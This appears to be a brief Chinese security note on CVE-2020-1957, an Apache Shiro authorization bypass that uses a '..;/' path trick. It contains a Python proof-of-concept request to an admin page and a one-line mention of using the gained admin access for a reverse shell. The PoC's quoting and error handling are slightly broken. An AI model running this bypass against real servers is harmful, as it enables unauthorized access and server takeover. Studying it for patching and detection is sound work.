1.描述
- Apache Shiro < 1.5.1
- 一个越权漏洞
2.原理
- 利用 Apache Shiro 和 Spring Boot 对URL的处理的差异化,可以绕过 Apache Shiro 对 Spring Boot 中的 Servlet 的权限控制,越权并实现未授权访问
3.POC
- poc.py
- import requests
url = “http://192.168.76.138:8080/xxx/..;/admin/”
res = requests.get(url)
try:
poc = “Account Info Page for:” in str(res.text)
if poc:
print(“CVE-2020-1957 is exist!”)
except:
print(“CVE-2020-1957 is not exist!”)
- import requests
4.EXP
- 利用网站管理员的权限对服务器进行反弹shell
